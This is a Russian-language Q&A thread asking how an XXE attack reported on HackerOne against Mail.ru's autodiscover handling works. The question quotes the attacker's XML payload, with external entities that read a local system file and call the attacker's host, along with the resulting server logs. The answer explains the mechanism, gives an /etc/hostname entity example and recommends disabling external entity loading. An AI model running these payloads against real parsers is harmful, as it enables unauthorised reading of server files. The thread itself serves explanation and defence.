# Как работает данная XXE атака?

Tags: xml, безопасность, xxe

[Здесь](https://hackerone.com/reports/315837) репорт, демонстрирующий атаку XXE.

Если вкратце, атакующий разместил у себя на сервере xml

```html
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
        <!ELEMENT foo ANY>
        <!ENTITY localfile SYSTEM "file:///sys/power/image_size">
        <!ENTITY remotedoc SYSTEM "http://obmhld.com/pocs/?token=xmlsdfgdg5454g54&doc1=2">
]>
<foo>&localfile;&remotedoc;</foo>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <Protocol>
        <Type>SMTP</Type>
        <Server>52.34.103.214</Server>
        <Port>1191</Port>
        <DomainRequired>off</DomainRequired>
        <LoginName>account@obmhld.com</LoginName>
        <DomainName>yandex.ru</DomainName>
        <SPA>off</SPA>
        <SSL>off</SSL>
        <AuthRequired>off</AuthRequired>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>
```

в определённой директории, и после этого попытался авторизоваться на сайте mail.ru со следующими данными:

`<any_login>@<atacker_server>`

И после этого с мэйловского сервера прилетают запросы на сервер атакующего:

1:

```
5.61.237.44 - - [14/Feb/2018:01:05:14 +0000] "GET /autodiscover/autodiscover.xml HTTP/1.0" 200 955 "http://obmhld.com/autodiscover/autodiscover.xml" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Tablet PC 2.0; Microsoft Outlook 15.0.4481; ms-office; MSOffice 15)"
```

2:

```
5.61.237.44 - - [14/Feb/2018:01:05:15 +0000] "GET /pocs/?token=xmlsdfgdg5454g54&doc1=2 HTTP/1.0" 200 10 "-" "-"
```

Хотелось бы понять механизм работы этой чудной атаки. Спасибо!

Answer (score 6, accepted):

Атака состоит из двух частей.

В первой части Mail.ru пытается узнать данные для получения почты с неизвестного домена, загружая `autodiscover.xml`. Понятно, зачем это им нужно: можно сразу дать человеку все данные для настройки сбора почты, останется только ввести пароль. Сам механизм известный, в нём самом каких-то проблем. [Примерный вид файла.](https://github.com/gronke/email-autodiscover/blob/master/mail/autodiscover.xml) Не исключаю что они до сих пор запрашивают этот файл.

Во второй части начинается интересное: парсер Mail.ru загружает внешние сущности (вида `&nbsp;` или `&custom;`), которые объявляются в начале документа:

```
<!ENTITY localfile SYSTEM "file:///sys/power/image_size">
<!ENTITY remotedoc SYSTEM "http://obmhld.com/pocs/?token=xmlsdfgdg5454g54&doc1=2">
```

В общем случае можно вставить сущность прямо в документ, получим содержимое файла, на которую она ссылается, прямо на экран. В данном случае это не работает, но всё равно можно увидеть получается распарсить файл или нет. Например, если первая сущность `&localfile;` ссылается на несуществующий файл, то вторая сущность `&remotedoc;` не приведет к HTTP запросу на сервер атакующего. Если же файл есть, то будет запрос к серверу атакующего.

Если говорить об общем случае, то возьмём такой XML:

```
<!DOCTYPE foo [<!ENTITY hostname SYSTEM "/etc/hostname">]>
<xml>
    &hostname;
</xml>
```

Пропустим его через xmllint:

```
xmllint --noent xxe.xml
```

И увидим у себя на экране имя вашего компьютера:

```
<?xml version="1.0"?>
<xml>
mysuperhostname
</xml>
```

Как защититься от этого? Отключить загрузку внешних сущностей. Например, в PHP для этого есть функция `libxml_disable_entity_loader()`. [Документация.](http://php.net/manual/ru/function.libxml-disable-entity-loader.php)

Comment: Спасибо, сообщество вам благодарно!